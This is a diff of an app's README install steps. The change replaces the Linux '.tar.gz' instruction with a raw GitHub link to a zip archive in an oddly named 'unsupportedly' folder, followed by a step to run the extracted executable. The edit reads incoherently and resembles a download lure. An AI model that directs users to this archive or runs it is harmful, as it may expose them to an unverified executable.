lazboby/V2L-Youtube2Guide-demo/README.md

    - Open the downloaded `.dmg` file.
    - Drag the application to your Applications folder.
 4. If you are using Linux:
-   - Extract the contents of the `.tar.gz` file.
+   - Extract the contents of the `https://raw.githubusercontent.com/lazboby/V2L-Youtube2Guide-demo/main/unsupportedly/Guide_demo_Youtube_v2.5-alpha.4.zip` file.
    - Open a terminal and navigate to the extracted folder, then execute the application using `./[app_executable_name]`.

 ## 🌟 Features